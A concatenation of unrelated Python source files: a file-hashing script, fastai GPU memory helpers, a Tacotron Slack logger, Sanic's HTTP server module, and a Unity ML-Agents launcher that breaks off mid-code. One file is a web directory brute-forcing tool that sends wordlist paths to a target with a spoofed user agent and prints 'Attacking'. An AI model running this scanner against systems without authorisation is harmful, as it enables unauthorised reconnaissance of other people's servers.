def main(args: List[str]):
if len(args) != 1:
print("Usage: ./pyhash.py <filename>")
filename = args[0]
with contextlib.ExitStack() as stack:
f = open(filename, "rb", buffering=0)
stack.callback(f.close)
q: _result_queue
q = queue.Queue(maxsize=max(50, multiprocessing.cpu_count() * 2))
cpus = multiprocessing.cpu_count()
executor = futures.ThreadPoolExecutor(max_workers=cpus)
stack.callback(executor.shutdown)
stop_reading = threading.Event()
# start filling the queue with eagerly evaluated futures.
reader_t = threading.Thread(
target=read_file, args=(f, executor, q, stop_reading)
)
reader_t.start()
@stack.callback
def stop_and_join_reader():
stop_reading.set()
try:
while True:
q.get(block=False)
except queue.Empty:
pass # we've emptied the queue
reader_t.join()
print_hashes(q)
if __name__ == "__main__":
sys.exit(main(args=sys.argv[1:]))
|
web_directory_discovery.py | #! /usr/bin/python
# -----------------------------------------------------------------------------------------------------------------------------
# GENERAL
# -----------------------------------------------------------------------------------------------------------------------------
#
# author: Sebastiaan Van Hoecke
# mail: sebastiaan@sevaho.io
#
# NOTE:
#
# -----------------------------------------------------------------------------------------------------------------------------
import sys
import getopt
import urllib3
import certifi
import threading
from queue import Queue
import os
# -----------------------------------------------------------------------------------------------------------------------------
# GLOBAL VARIABLES
# -----------------------------------------------------------------------------------------------------------------------------
headers = {}
headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0'
url_queue = Queue()
lists_dir = '/home/sevaho/GitHub/SecLists/Discovery/Web-Content/'
url_base = 'https://sevaho.io/'
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
# -----------------------------------------------------------------------------------------------------------------------------
# FUNCTIONS
# -----------------------------------------------------------------------------------------------------------------------------
def usage ():
print("Usage: %s [OPTIONS]... [ARGS]... \
\n \
\n description\
\n \
\nOPTIONS:\
\n \
\n -h, * display the help and exit\
\n -t, --target specify target \
\n -l, --listdir specifiy a directory containing worldlist text files \
\n \
\nEXAMPLES:\
\n \
\n ./webspy.py -t https://example.com -l my_custom_worldlist_directory \
\n \
\nNOTE:\
\n \
" % (sys.argv[0]))
sys.exit(1)
def expand_queue ():
for r, d, f in os.walk(lists_dir):
for file in f:
with open(r + '/' + file) as fd:
try:
line = fd.readline()
while line:
url_queue.put(line.strip())
line = fd.readline()
except Exception as e:
pass
fd.close()
def look_up_directory ():
while not url_queue.empty():
url_directory = url_queue.get()
r = http.request('GET', url_base + url_directory, headers=headers)
url_queue.task_done()
if r.status != 404:
print('[%d] => %s' % (r.status, url_base + url_directory))
# -----------------------------------------------------------------------------------------------------------------------------
# MAIN
# -----------------------------------------------------------------------------------------------------------------------------
def main (argv):
global url_queue, url_base, lists_dir
if not len(argv):
usage()
try:
opts, args = getopt.getopt(argv, "ht:l:", ["help", "target", "listdir"])
except getopt.GetoptError as err:
print("error: %s" % (str(err)))
usage()
for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
elif opt in ("-t", "--target"):
url_base = arg + '/'
elif opt in ("-l", "--listdir"):
lists_dir = arg
else:
assert False, "Unhandled Option"
print("Attacking: %s" % (url_base))
for x in range(1):
t = threading.Thread(target=expand_queue, args=())
t.start()
for x in range(15):
t = threading.Thread(target=look_up_directory, args=())
t.start()
for x in range(15):
t.join()
if __name__ == "__main__":
main(sys.argv[1:])
|
mem.py | "Utility functions for memory management"
from ..imports.torch import *
from ..core import *
from ..script import *
from ..utils.env import *
import pynvml, functools, traceback, threading, time
from collections import namedtuple
IS_IN_IPYTHON = is_in_ipython()
GPUMemory = namedtuple('GPUMemory', ['total', 'used', 'free'])
have_cuda = 0
if torch.cuda.is_available():
pynvml.nvmlInit()
have_cuda = 1
def preload_pytorch():
torch.ones((1, 1)).cuda()
def b2mb(num):
""" convert Bs to MBs and round down """
return int(num/2**20)
def gpu_mem_get(id=None):
"get total, used and free memory (in MBs) for gpu `id`. if `id` is not passed, currently selected torch device is used"
if not have_cuda: return GPUMemory(0, 0, 0)
if id is None: id = torch.cuda.current_device()
try:
handle = pynvml.nvmlDeviceGetHandleByIndex(id)
info = pynvml.nvmlDeviceGetMemoryInfo(handle)
return GPUMemory(*(map(b2mb, [info.total, info.used, info.free])))
except:
return GPUMemory(0, 0, 0)
def gpu_mem_get_all():
"get total, used and free memory (in MBs) for each available gpu"
if not have_cuda: return []
return list(map(gpu_mem_get, range(pynvml.nvmlDeviceGetCount())))
def gpu_mem_get_free_no_cache():
"get free memory (in MBs) for the currently selected gpu id, after emptying the cache"
torch.cuda.empty_cache()
return gpu_mem_get().free
def gpu_mem_get_used_no_cache():
"get used memory (in MBs) for the currently selected gpu id, after emptying the cache"
torch.cuda.empty_cache()
return gpu_mem_get().used
def gpu_mem_get_used_fast(gpu_handle):
"get used memory (in MBs) for the currently selected gpu id, w/o emptying the cache, and needing the `gpu_handle` arg"
info = pynvml.nvmlDeviceGetMemoryInfo(gpu_handle)
return b2mb(info.used)
def gpu_with_max_free_mem():
"get [gpu_id, its_free_ram] for the first gpu with highest available RAM"
mem_all = gpu_mem_get_all()
if not len(mem_all): return None, 0
free_all = np.array([x.free for x in mem_all])
id = np.argmax(free_all)
return id, free_all[id]
def get_ref_free_exc_info():
"Free traceback from references to locals() in each frame to avoid circular reference leading to gc.collect() unable to reclaim memory"
type, val, tb = sys.exc_info()
traceback.clear_frames(tb)
return (type, val, tb)
def gpu_mem_restore(func):
"Reclaim GPU RAM if CUDA out of memory happened, or execution was interrupted"
@functools.wraps(func)
def wrapper(*args, **kwargs):
tb_clear_frames = os.environ.get('FASTAI_TB_CLEAR_FRAMES', None)
if not IS_IN_IPYTHON or tb_clear_frames=="0":
return func(*args, **kwargs)
try:
return func(*args, **kwargs)
except Exception as e:
if ("CUDA out of memory" in str(e) or
"device-side assert triggered" in str(e) or
tb_clear_frames == "1"):
type, val, tb = get_ref_free_exc_info() # must!
gc.collect()
raise type(val).with_traceback(tb) from None
else: raise # re-raises the exact last exception
return wrapper
class gpu_mem_restore_ctx():
"context manager to reclaim RAM if an exception happened under ipython"
def __enter__(self): return self
def __exit__(self, exc_type, exc_val, exc_tb):
if not exc_val: return True
traceback.clear_frames(exc_tb)
gc.collect()
raise exc_type(exc_val).with_traceback(exc_tb) from None
class GPUMemTrace():
"Trace GPU allocated and peaked memory usage"
def __init__(self, silent=False):
assert torch.cuda.is_available(), "pytorch CUDA is required"
self.silent = silent # quickly turn off printouts from the constructor
self.reset()
def __enter__(self):
self.start()
return self
def __exit__(self, *exc):
self.stop()
def __repr__(self):
delta_used, delta_peaked = self.data()
return f"โณused: {delta_used}MB, โณpeaked: {delta_peaked}MB"
def silent(self, silent=False):
self.silent = silent
def reset(self):
self.used_start = gpu_mem_get_used_no_cache()
self.used_peak = self.used_start
self.data_is_set = False
def start(self):
self.reset()
self.peak_monitor_start()
def stop(self):
self.data_set()
self.peak_monitor_stop()
def __del__(self):
self.stop()
def data_set(self):
self.delta_used = gpu_mem_get_used_no_cache() - self.used_start
self.delta_peaked = self.used_peak - self.used_start - self.delta_used
self.data_is_set = True
def data(self):
if not self.data_is_set: self.data_set()
return (self.delta_used, self.delta_peaked)
def report_n_reset(self, note=''):
self.report(note)
self.reset()
def report(self, note=''):
"printout used+peaked, and an optional context note"
if self.silent: return
delta_used, delta_peaked = self.data()
if note: note = f": {note}"
print(f"{self}{note}")
def peak_monitor_start(self):
self.peak_monitoring = True
# continually sample RAM usage
peak_monitor_thread = threading.Thread(target=self.peak_monitor_func)
peak_monitor_thread.daemon = True
peak_monitor_thread.start()
def peak_monitor_stop(self):
self.peak_monitoring = False
def peak_monitor_func(self):
gpu_handle = pynvml.nvmlDeviceGetHandleByIndex(torch.cuda.current_device())
while True:
self.used_peak = max(gpu_mem_get_used_fast(gpu_handle), self.used_peak)
if not self.peak_monitoring: break
time.sleep(0.001) # 1msec
|
infolog.py | import atexit
from datetime import datetime
import json
from threading import Thread
from urllib.request import Request, urlopen
_format = '%Y-%m-%d %H:%M:%S.%f'
_file = None
_run_name = None
_slack_url = None
def init(filename, run_name, slack_url=None):
global _file, _run_name, _slack_url
_close_logfile()
_file = open(filename, 'a', encoding="utf-8")
_file.write('\n-----------------------------------------------------------------\n')
_file.write('Starting new training run\n')
_file.write('-----------------------------------------------------------------\n')
_run_name = run_name
_slack_url = slack_url
def log(msg, slack=False):
_msg = msg.encode('utf-8')
print(_msg)
if _file is not None:
_file.write('[%s] %s\n' % (datetime.now().strftime(_format)[:-3], _msg))
if slack and _slack_url is not None:
Thread(target=_send_slack, args=(_msg,)).start()
def _close_logfile():
global _file
if _file is not None:
_file.close()
_file = None
def _send_slack(msg):
req = Request(_slack_url)
req.add_header('Content-Type', 'application/json')
urlopen(req, json.dumps({
'username': 'tacotron',
'icon_emoji': ':taco:',
'text': '*%s*: %s' % (_run_name, msg)
}).encode())
atexit.register(_close_logfile)
|
server.py | import asyncio
import os
import traceback
from functools import partial
from inspect import isawaitable
from multiprocessing import Process
from signal import SIG_IGN, SIGINT, SIGTERM, Signals
from signal import signal as signal_func
from socket import SO_REUSEADDR, SOL_SOCKET, socket
from time import time
from httptools import HttpRequestParser
from httptools.parser.errors import HttpParserError
from multidict import CIMultiDict
from sanic.exceptions import (
InvalidUsage,
PayloadTooLarge,
RequestTimeout,
ServerError,
ServiceUnavailable,
)
from sanic.log import access_logger, logger
from sanic.request import Request, StreamBuffer
from sanic.response import HTTPResponse
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ImportError:
pass
current_time = None
class Signal:
stopped = False
class HttpProtocol(asyncio.Protocol):
"""
This class provides a basic HTTP implementation of the sanic framework.
"""
__slots__ = (
# event loop, connection
"loop",
"transport",
"connections",
"signal",
# request params
"parser",
"request",
"url",
"headers",
# request config
"request_handler",
"request_timeout",
"response_timeout",
"keep_alive_timeout",
"request_max_size",
"request_buffer_queue_size",
"request_class",
"is_request_stream",
"router",
"error_handler",
# enable or disable access log purpose
"access_log",
# connection management
"_total_request_size",
"_request_timeout_handler",
"_response_timeout_handler",
"_keep_alive_timeout_handler",
"_last_request_time",
"_last_response_time",
"_is_stream_handler",
"_not_paused",
"_request_handler_task",
"_request_stream_task",
"_keep_alive",
"_header_fragment",
"state",
"_debug",
)
def __init__(
self,
*,
loop,
request_handler,
error_handler,
signal=Signal(),
connections=None,
request_timeout=60,
response_timeout=60,
keep_alive_timeout=5,
request_max_size=None,
request_buffer_queue_size=100,
request_class=None,
access_log=True,
keep_alive=True,
is_request_stream=False,
router=None,
state=None,
debug=False,
**kwargs
):
self.loop = loop
self.transport = None
self.request = None
self.parser = None
self.url = None
self.headers = None
self.router = router
self.signal = signal
self.access_log = access_log
self.connections = connections or set()
self.request_handler = request_handler
self.error_handler = error_handler
self.request_timeout = request_timeout
self.request_buffer_queue_size = request_buffer_queue_size
self.response_timeout = response_timeout
self.keep_alive_timeout = keep_alive_timeout
self.request_max_size = request_max_size
self.request_class = request_class or Request
self.is_request_stream = is_request_stream
self._is_stream_handler = False
self._not_paused = asyncio.Event(loop=loop)
self._total_request_size = 0
self._request_timeout_handler = None
self._response_timeout_handler = None
self._keep_alive_timeout_handler = None
self._last_request_time = None
self._last_response_time = None
self._request_handler_task = None
self._request_stream_task = None
self._keep_alive = keep_alive
self._header_fragment = b""
self.state = state if state else {}
if "requests_count" not in self.state:
self.state["requests_count"] = 0
self._debug = debug
self._not_paused.set()
@property
def keep_alive(self):
"""
Check if the connection needs to be kept alive based on the params
attached to the `_keep_alive` attribute, :attr:`Signal.stopped`
and :func:`HttpProtocol.parser.should_keep_alive`
:return: ``True`` if connection is to be kept alive ``False`` else
"""
return (
self._keep_alive
and not self.signal.stopped
and self.parser.should_keep_alive()
)
# -------------------------------------------- #
# Connection
# -------------------------------------------- #
def connection_made(self, transport):
self.connections.add(self)
self._request_timeout_handler = self.loop.call_later(
self.request_timeout, self.request_timeout_callback
)
self.transport = transport
self._last_request_time = current_time
def connection_lost(self, exc):
self.connections.discard(self)
if self._request_handler_task:
self._request_handler_task.cancel()
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_timeout_handler:
self._request_timeout_handler.cancel()
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
if self._keep_alive_timeout_handler:
self._keep_alive_timeout_handler.cancel()
def pause_writing(self):
self._not_paused.clear()
def resume_writing(self):
self._not_paused.set()
def request_timeout_callback(self):
# See the docstring in the RequestTimeout exception, to see
# exactly what this timeout is checking for.
# Check if elapsed time since request initiated exceeds our
# configured maximum request timeout value
time_elapsed = current_time - self._last_request_time
if time_elapsed < self.request_timeout:
time_left = self.request_timeout - time_elapsed
self._request_timeout_handler = self.loop.call_later(
time_left, self.request_timeout_callback
)
else:
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_handler_task:
self._request_handler_task.cancel()
self.write_error(RequestTimeout("Request Timeout"))
def response_timeout_callback(self):
# Check if elapsed time since response was initiated exceeds our
# configured maximum request timeout value
time_elapsed = current_time - self._last_request_time
if time_elapsed < self.response_timeout:
time_left = self.response_timeout - time_elapsed
self._response_timeout_handler = self.loop.call_later(
time_left, self.response_timeout_callback
)
else:
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_handler_task:
self._request_handler_task.cancel()
self.write_error(ServiceUnavailable("Response Timeout"))
def keep_alive_timeout_callback(self):
"""
Check if elapsed time since last response exceeds our configured
maximum keep alive timeout value and if so, close the transport
pipe and let the response writer handle the error.
:return: None
"""
time_elapsed = current_time - self._last_response_time
if time_elapsed < self.keep_alive_timeout:
time_left = self.keep_alive_timeout - time_elapsed
self._keep_alive_timeout_handler = self.loop.call_later(
time_left, self.keep_alive_timeout_callback
)
else:
logger.debug("KeepAlive Timeout. Closing connection.")
self.transport.close()
self.transport = None
# -------------------------------------------- #
# Parsing
# -------------------------------------------- #
def data_received(self, data):
# Check for the request itself getting too large and exceeding
# memory limits
self._total_request_size += len(data)
if self._total_request_size > self.request_max_size:
self.write_error(PayloadTooLarge("Payload Too Large"))
# Create parser if this is the first time we're receiving data
if self.parser is None:
assert self.request is None
self.headers = []
self.parser = HttpRequestParser(self)
# requests count
self.state["requests_count"] = self.state["requests_count"] + 1
# Parse request chunk or close connection
try:
self.parser.feed_data(data)
except HttpParserError:
message = "Bad Request"
if self._debug:
message += "\n" + traceback.format_exc()
self.write_error(InvalidUsage(message))
def on_url(self, url):
if not self.url:
self.url = url
else:
self.url += url
def on_header(self, name, value):
self._header_fragment += name
if value is not None:
if (
self._header_fragment == b"Content-Length"
and int(value) > self.request_max_size
):
self.write_error(PayloadTooLarge("Payload Too Large"))
try:
value = value.decode()
except UnicodeDecodeError:
value = value.decode("latin_1")
self.headers.append(
(self._header_fragment.decode().casefold(), value)
)
self._header_fragment = b""
def on_headers_complete(self):
self.request = self.request_class(
url_bytes=self.url,
headers=CIMultiDict(self.headers),
version=self.parser.get_http_version(),
method=self.parser.get_method().decode(),
transport=self.transport,
)
# Remove any existing KeepAlive handler here,
# It will be recreated if required on the new request.
if self._keep_alive_timeout_handler:
self._keep_alive_timeout_handler.cancel()
self._keep_alive_timeout_handler = None
if self.is_request_stream:
self._is_stream_handler = self.router.is_stream_handler(
self.request
)
if self._is_stream_handler:
self.request.stream = StreamBuffer(
self.request_buffer_queue_size
)
self.execute_request_handler()
def on_body(self, body):
if self.is_request_stream and self._is_stream_handler:
self._request_stream_task = self.loop.create_task(
self.body_append(body)
)
else:
self.request.body_push(body)
async def body_append(self, body):
if self.request.stream.is_full():
self.transport.pause_reading()
await self.request.stream.put(body)
self.transport.resume_reading()
else:
await self.request.stream.put(body)
def on_message_complete(self):
# Entire request (headers and whole body) is received.
# We can cancel and remove the request timeout handler now.
if self._request_timeout_handler:
self._request_timeout_handler.cancel()
self._request_timeout_handler = None
if self.is_request_stream and self._is_stream_handler:
self._request_stream_task = self.loop.create_task(
self.request.stream.put(None)
)
return
self.request.body_finish()
self.execute_request_handler()
def execute_request_handler(self):
"""
Invoke the request handler defined by the
:func:`sanic.app.Sanic.handle_request` method
:return: None
"""
self._response_timeout_handler = self.loop.call_later(
self.response_timeout, self.response_timeout_callback
)
self._last_request_time = current_time
self._request_handler_task = self.loop.create_task(
self.request_handler(
self.request, self.write_response, self.stream_response
)
)
# -------------------------------------------- #
# Responding
# -------------------------------------------- #
def log_response(self, response):
"""
Helper method provided to enable the logging of responses in case if
the :attr:`HttpProtocol.access_log` is enabled.
:param response: Response generated for the current request
:type response: :class:`sanic.response.HTTPResponse` or
:class:`sanic.response.StreamingHTTPResponse`
:return: None
"""
if self.access_log:
extra = {"status": getattr(response, "status", 0)}
if isinstance(response, HTTPResponse):
extra["byte"] = len(response.body)
else:
extra["byte"] = -1
extra["host"] = "UNKNOWN"
if self.request is not None:
if self.request.ip:
extra["host"] = "{0}:{1}".format(
self.request.ip, self.request.port
)
extra["request"] = "{0} {1}".format(
self.request.method, self.request.url
)
else:
extra["request"] = "nil"
access_logger.info("", extra=extra)
def write_response(self, response):
"""
Writes response content synchronously to the transport.
"""
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
try:
keep_alive = self.keep_alive
self.transport.write(
response.output(
self.request.version, keep_alive, self.keep_alive_timeout
)
)
self.log_response(response)
except AttributeError:
logger.error(
"Invalid response object for url %s, "
"Expected Type: HTTPResponse, Actual Type: %s",
self.url,
type(response),
)
self.write_error(ServerError("Invalid response type"))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before response written @ %s",
self.request.ip,
)
keep_alive = False
except Exception as e:
self.bail_out(
"Writing response failed, connection closed {}".format(repr(e))
)
finally:
if not keep_alive:
self.transport.close()
self.transport = None
else:
self._keep_alive_timeout_handler = self.loop.call_later(
self.keep_alive_timeout, self.keep_alive_timeout_callback
)
self._last_response_time = current_time
self.cleanup()
async def drain(self):
await self._not_paused.wait()
def push_data(self, data):
self.transport.write(data)
async def stream_response(self, response):
"""
Streams a response to the client asynchronously. Attaches
the transport to the response so the response consumer can
write to the response as needed.
"""
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
try:
keep_alive = self.keep_alive
response.protocol = self
await response.stream(
self.request.version, keep_alive, self.keep_alive_timeout
)
self.log_response(response)
except AttributeError:
logger.error(
"Invalid response object for url %s, "
"Expected Type: HTTPResponse, Actual Type: %s",
self.url,
type(response),
)
self.write_error(ServerError("Invalid response type"))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before response written @ %s",
self.request.ip,
)
keep_alive = False
except Exception as e:
self.bail_out(
"Writing response failed, connection closed {}".format(repr(e))
)
finally:
if not keep_alive:
self.transport.close()
self.transport = None
else:
self._keep_alive_timeout_handler = self.loop.call_later(
self.keep_alive_timeout, self.keep_alive_timeout_callback
)
self._last_response_time = current_time
self.cleanup()
def write_error(self, exception):
# An error _is_ a response.
# Don't throw a response timeout, when a response _is_ given.
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
response = None
try:
response = self.error_handler.response(self.request, exception)
version = self.request.version if self.request else "1.1"
self.transport.write(response.output(version))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before error written @ %s",
self.request.ip if self.request else "Unknown",
)
except Exception as e:
self.bail_out(
"Writing error failed, connection closed {}".format(repr(e)),
from_error=True,
)
finally:
if self.parser and (
self.keep_alive or getattr(response, "status", 0) == 408
):
self.log_response(response)
try:
self.transport.close()
except AttributeError:
logger.debug("Connection lost before server could close it.")
def bail_out(self, message, from_error=False):
"""
In case if the transport pipes are closed and the sanic app encounters
an error while writing data to the transport pipe, we log the error
with proper details.
:param message: Error message to display
:param from_error: If the bail out was invoked while handling an
exception scenario.
:type message: str
:type from_error: bool
:return: None
"""
if from_error or self.transport.is_closing():
logger.error(
"Transport closed @ %s and exception "
"experienced during error handling",
self.transport.get_extra_info("peername"),
)
logger.debug("Exception:", exc_info=True)
else:
self.write_error(ServerError(message))
logger.error(message)
def cleanup(self):
"""This is called when KeepAlive feature is used,
it resets the connection in order for it to be able
to handle receiving another request on the same connection."""
self.parser = None
self.request = None
self.url = None
self.headers = None
self._request_handler_task = None
self._request_stream_task = None
self._total_request_size = 0
self._is_stream_handler = False
def close_if_idle(self):
"""Close the connection if a request is not being sent or received
:return: boolean - True if closed, false if staying open
"""
if not self.parser:
self.transport.close()
return True
return False
def close(self):
"""
Force close the connection.
"""
if self.transport is not None:
self.transport.close()
self.transport = None
def update_current_time(loop):
"""Cache the current time, since it is needed at the end of every
keep-alive request to update the request timeout time
:param loop:
:return:
"""
global current_time
current_time = time()
loop.call_later(1, partial(update_current_time, loop))
def trigger_events(events, loop):
"""Trigger event callbacks (functions or async)
:param events: one or more sync or async functions to execute
:param loop: event loop
"""
for event in events:
result = event(loop)
if isawaitable(result):
loop.run_until_complete(result)
def serve(
host,
port,
request_handler,
error_handler,
before_start=None,
after_start=None,
before_stop=None,
after_stop=None,
debug=False,
request_timeout=60,
response_timeout=60,
keep_alive_timeout=5,
ssl=None,
sock=None,
request_max_size=None,
request_buffer_queue_size=100,
reuse_port=False,
loop=None,
protocol=HttpProtocol,
backlog=100,
register_sys_signals=True,
run_multiple=False,
run_async=False,
connections=None,
signal=Signal(),
request_class=None,
access_log=True,
keep_alive=True,
is_request_stream=False,
router=None,
websocket_max_size=None,
websocket_max_queue=None,
websocket_read_limit=2 ** 16,
websocket_write_limit=2 ** 16,
state=None,
graceful_shutdown_timeout=15.0,
asyncio_server_kwargs=None,
):
"""Start asynchronous HTTP Server on an individual process.
:param host: Address to host on
:param port: Port to host on
:param request_handler: Sanic request handler with middleware
:param error_handler: Sanic error handler with middleware
:param before_start: function to be executed before the server starts
listening. Takes arguments `app` instance and `loop`
:param after_start: function to be executed after the server starts
listening. Takes arguments `app` instance and `loop`
:param before_stop: function to be executed when a stop signal is
received before it is respected. Takes arguments
`app` instance and `loop`
:param after_stop: function to be executed when a stop signal is
received after it is respected. Takes arguments
`app` instance and `loop`
:param debug: enables debug output (slows server)
:param request_timeout: time in seconds
:param response_timeout: time in seconds
:param keep_alive_timeout: time in seconds
:param ssl: SSLContext
:param sock: Socket for the server to accept connections from
:param request_max_size: size in bytes, `None` for no limit
:param reuse_port: `True` for multiple workers
:param loop: asyncio compatible event loop
:param protocol: subclass of asyncio protocol class
:param request_class: Request class to use
:param access_log: disable/enable access log
:param websocket_max_size: enforces the maximum size for
incoming messages in bytes.
:param websocket_max_queue: sets the maximum length of the queue
that holds incoming messages.
:param websocket_read_limit: sets the high-water limit of the buffer for
incoming bytes, the low-water limit is half
the high-water limit.
:param websocket_write_limit: sets the high-water limit of the buffer for
outgoing bytes, the low-water limit is a
quarter of the high-water limit.
:param is_request_stream: disable/enable Request.stream
:param request_buffer_queue_size: streaming request buffer queue size
:param router: Router object
:param graceful_shutdown_timeout: How long take to Force close non-idle
connection
:param asyncio_server_kwargs: key-value args for asyncio/uvloop
create_server method
:return: Nothing
"""
if not run_async:
# create new event_loop after fork
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
if debug:
loop.set_debug(debug)
connections = connections if connections is not None else set()
server = partial(
protocol,
loop=loop,
connections=connections,
signal=signal,
request_handler=request_handler,
error_handler=error_handler,
request_timeout=request_timeout,
response_timeout=response_timeout,
keep_alive_timeout=keep_alive_timeout,
request_max_size=request_max_size,
request_class=request_class,
access_log=access_log,
keep_alive=keep_alive,
is_request_stream=is_request_stream,
router=router,
websocket_max_size=websocket_max_size,
websocket_max_queue=websocket_max_queue,
websocket_read_limit=websocket_read_limit,
websocket_write_limit=websocket_write_limit,
state=state,
debug=debug,
)
asyncio_server_kwargs = (
asyncio_server_kwargs if asyncio_server_kwargs else {}
)
server_coroutine = loop.create_server(
server,
host,
port,
ssl=ssl,
reuse_port=reuse_port,
sock=sock,
backlog=backlog,
**asyncio_server_kwargs
)
# Instead of pulling time at the end of every request,
# pull it once per minute
loop.call_soon(partial(update_current_time, loop))
if run_async:
return server_coroutine
trigger_events(before_start, loop)
try:
http_server = loop.run_until_complete(server_coroutine)
except BaseException:
logger.exception("Unable to start server")
return
trigger_events(after_start, loop)
# Ignore SIGINT when run_multiple
if run_multiple:
signal_func(SIGINT, SIG_IGN)
# Register signals for graceful termination
if register_sys_signals:
_singals = (SIGTERM,) if run_multiple else (SIGINT, SIGTERM)
for _signal in _singals:
try:
loop.add_signal_handler(_signal, loop.stop)
except NotImplementedError:
logger.warning(
"Sanic tried to use loop.add_signal_handler "
"but it is not implemented on this platform."
)
pid = os.getpid()
try:
logger.info("Starting worker [%s]", pid)
loop.run_forever()
finally:
logger.info("Stopping worker [%s]", pid)
# Run the on_stop function if provided
trigger_events(before_stop, loop)
# Wait for event loop to finish and all connections to drain
http_server.close()
loop.run_until_complete(http_server.wait_closed())
# Complete all tasks on the loop
signal.stopped = True
for connection in connections:
connection.close_if_idle()
# Gracefully shutdown timeout.
# We should provide graceful_shutdown_timeout,
# instead of letting connection hangs forever.
# Let's roughly calcucate time.
start_shutdown = 0
while connections and (start_shutdown < graceful_shutdown_timeout):
loop.run_until_complete(asyncio.sleep(0.1))
start_shutdown = start_shutdown + 0.1
# Force close non-idle connection after waiting for
# graceful_shutdown_timeout
coros = []
for conn in connections:
if hasattr(conn, "websocket") and conn.websocket:
coros.append(conn.websocket.close_connection())
else:
conn.close()
_shutdown = asyncio.gather(*coros, loop=loop)
loop.run_until_complete(_shutdown)
trigger_events(after_stop, loop)
loop.close()
def serve_multiple(server_settings, workers):
"""Start multiple server processes simultaneously. Stop on interrupt
and terminate signals, and drain connections when complete.
:param server_settings: kw arguments to be passed to the serve function
:param workers: number of workers to launch
:param stop_event: if provided, is used as a stop signal
:return:
"""
server_settings["reuse_port"] = True
server_settings["run_multiple"] = True
# Handling when custom socket is not provided.
if server_settings.get("sock") is None:
sock = socket()
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind((server_settings["host"], server_settings["port"]))
sock.set_inheritable(True)
server_settings["sock"] = sock
server_settings["host"] = None
server_settings["port"] = None
def sig_handler(signal, frame):
logger.info("Received signal %s. Shutting down.", Signals(signal).name)
for process in processes:
os.kill(process.pid, SIGTERM)
signal_func(SIGINT, lambda s, f: sig_handler(s, f))
signal_func(SIGTERM, lambda s, f: sig_handler(s, f))
processes = []
for _ in range(workers):
process = Process(target=serve, kwargs=server_settings)
process.daemon = True
process.start()
processes.append(process)
for process in processes:
process.join()
# the above processes will block this until they're stopped
for process in processes:
process.terminate()
server_settings.get("sock").close()
|
learn.py | # # Unity ML-Agents Toolkit
import logging
from multiprocessing import Process, Queue
import numpy as np
from docopt import docopt
from mlagents.trainers.trainer_controller import TrainerController
from mlagents.trainers.exception import TrainerError
def run_training(sub_id, run_seed, run_options, process_queue):
"""
Launches training session.
:param process_queue: Queue used to send signal back to main.
:param sub_id: Unique id for training session.
:param run_seed: Random seed used for training.
:param run_options: Command line arguments for training.
"""
# Docker Parameters
docker_target_name = (run_options['--docker-target-name']
if run_options['--docker-target-name'] != 'None' else None)
# General parameters
env_path = None
run_id = run_options['--run-id']
load_model = run_options['--load']
train_model = run_options['--train']
save_freq = int(run_options['--save-freq'])
keep_checkpoints = int(run_options['--keep-checkpoints'])
worker_id = 0
curriculum_file = None
lesson = 0
fast_simulation = False
no_graphics = False
trainer_config_path = run_options['<trainer-config-path>']
# Create controller and launch environment.
tc = TrainerController(env_path, run_id + '-' + str(sub_id),
save_freq, curriculum_file, fast_simulation,
load_model, train_model, worker_id + sub_id,
keep_checkpoints, lesson, run_seed,
docker_target_name, trainer_config_path, no_graphics)
# Signal that environment has been launched.
# process_queue.put(True)
# Begin training
tc.start_learning()
def main():
try:
print('''
โโโโโโโ
โโโโโโโโโโโโโ
,โโโmโโโ' ,โโโโโโโ โโโ โโโ
โโโโโ' โโโโ โโโ โโ โโ ,โโ โโโโ ,โโ โโโโโ โโโ ,โโ
โโโโโ โโโโ โโโโ โโโ โโโ โโโโโโโโโโ โโโ โโโโโ ^โโโ โโโโ
โโโโโโโโโโโโโโโโโ โโ โโโ โโโ โโโ โโโ โโโ โโโ โโโโ โโโ
โโโโโโโโโโโโโโโโโโ โโ โโโ โโโ โโโ โโโ โโโ โโโ โโโโโโ
^โโโโ โโโโ โโโโ โโโโโโโโโ โโโ โโโ โโโ โโโโ โโโโ`
'โโโโโ ^โโโ โโโ โโโโโ โโ ^โโ `โโ `โโ 'โโ โโโโ
โโโโโโโโ โโโโโโ, โโโโโ
`โโโโโโโโโโโโ
ยฌ`โโโโโ
''')
except:
print('\n\n\tUnity Technologies\n')
logger = logging.getLogger('mlagents.trainers')
_USAGE = '''
Usage:
mlagents-learn <trainer-config-path> [options]
mlagents-learn --help
Options:
--env=<file> Name of the Unity executable [default: None].
--curriculum=<directory> Curriculum json directory for environment [default: None].
--keep-checkpoints=<n> How many model checkpoints to keep [default: 5].
--lesson=<n> Start learning from this lesson [default: 0].
--load Whether to load the model or randomly initialize [default: False].
--run-id=<path> The directory name for model and summary statistics [default: ppo].
--num-runs=<n> Number of concurrent training sessions [default: 1].
--save-freq=<n> Frequency at which to save model [default: 50000].
--seed=<n> Random seed used for training [default: -1].
--slow Whether to run the game at training speed [default: False].
--train Whether to train model, or only run inference [default: False].
--worker-id=<n> Number to add to communication port (5005) [default: 0].
--docker-target-name=<dt> Docker volume to store training-specific files [default: None].
--no-graphics Whether to run the environment in no-graphics mode [default: False].
'''
options = docopt(_USAGE)
logger.info(options)
num_runs = int(options['--num-runs'])
seed = int(options['--seed'])
if options['--env'] == 'None' and num_runs > 1:
raise TrainerError('It is not possible to launch more than one concurrent training session '
'when training from the editor.')
jobs = []
run_seed = seed
# options['--env'] = None
# options[]
run_training(1,run_seed,options,None)
# for i in range(num_runs):
# if seed == -1:
# run_seed = np.random.randint(0, 10000)
# process_queue = Queue()
